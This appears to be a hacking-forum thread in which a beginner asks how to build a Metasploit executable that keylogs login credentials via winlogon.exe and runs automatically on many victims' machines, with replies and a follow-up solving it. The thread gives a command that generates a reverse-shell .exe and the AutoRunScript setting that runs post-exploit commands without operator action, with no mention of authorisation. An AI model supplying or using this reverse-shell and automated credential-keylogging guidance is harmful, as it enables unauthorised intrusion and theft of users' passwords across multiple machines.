Hello everyone,
Firstly I would like to introduce myself; i'm indianam, i'm new to hacking, and i'm looking forwards to learning more about penetration testing and the different aspects of cyber security.
Secondly, I have a question regarding making Metasploit .exe's that automatically perform task. For example if I wanted to make a .exe payload that would install a key logger attached to the winlogon.exe process and store the results in a file or send them back to my machine as to find a user credentials without having to crack it, how could I automate it so that all of this could be performed without having to open a meterpreter session and doing it all manually. I may not be able to know when they would run this .exe file so I can't just sit around at my computer all day with a listener open.
I've read up on making a .rc file but I can't figure out how to make it works without need of manual intervention. I feel like this could be very useful if attacking multiple machines at the same time since I wouldn't be able to manage all the sessions at once. Or if you don't know when they will run the .exe it would serve as an automatic way to collect information and run payloads.
Thanks for all the help,
Sincerely,
Indiana Moreau
************Solution**************
With the help of the wonderful people here at Null Byte I was able to solve my issue using the AutoRunScript option which allows to automatically run commands post-exploit. I put the link to an article explaining it a bit better at the bottom of the article. Thanks everyone for all the great help, I am very grateful :)
AutoRunScript | offensive Infosec Blog
Posts about AutoRunScript written by John
9 Responses
Please start here.
ghost_
Thanks for the article, I looked through it and it has tons of great stuff!
I have looked through quite a few article in the past couple of weeks but I have yet to find an article which talks about making and automatic .exe files.
Thanks for article, it was really helpful :)
I don't quite understand what you mean by an automatic .exe file, you're being very vague with the question.
However, with your skill level, you need to start from the beginning. This is why I posted that link; you have to learn to walk before you can run.
ghost_
Sorry about that, i'll try to be explain myself better. I've been at Null Byte for the past couple of weeks and have looked through lots of the tutorials here and their all great but it mainly focuses on single machine attacks and I was trying to find a way to attacking multiple machine but it causes an issue since I can't always be monitoring each meterpreter session individually. The solution that I thought might work would be to turn the meterpreter payload into a .exe using something similar to this.
msfpayload windows/shellreversetcp X > /tmp/1.exe
Using the X command I can transfer the reverse shell payload into an .exe file that, when run on the target machine, will attempt to connect back to my machine.
The issue with this is that I can turn payloads into .exe files but I can't find a way to automate commands to run in those payloads after their on the targets computer without opening a meterpreter sessions and manually running the keyscan command attached to winlogon.exe process(so that it only key logs the log in credentials).
If you know of another way to attack multiple machines effectively I would love learn. Thank you very much for your help and i'll keep reading different tutorials to see if I can find a way to do this.
Have you considered writing a meterpreter script?
I've looked into it but it still requires me to connect to the meterpreter session and then run the script. If there was a way to run the script without the need for me to open the sessions manually that would solve my issues but I haven't been able a way to do that yet.
Look at this page:
Meterpreter Scripting
You can usually set an automatic task to be run with the exploit/multi/handler by using
set AutoRunScript multi_console_command -rc /root/yourfile.rc
Thanks for the article, I think I will be taking the meterpreter scripting approach, not quite exactly what I was looking for but I think it should work fine, thanks :)
No problem.
When you play with modules in the cli, be sure to use "show advanced" as well as "show options" so that you can see the more advanced options of the module!
Share Your Thoughts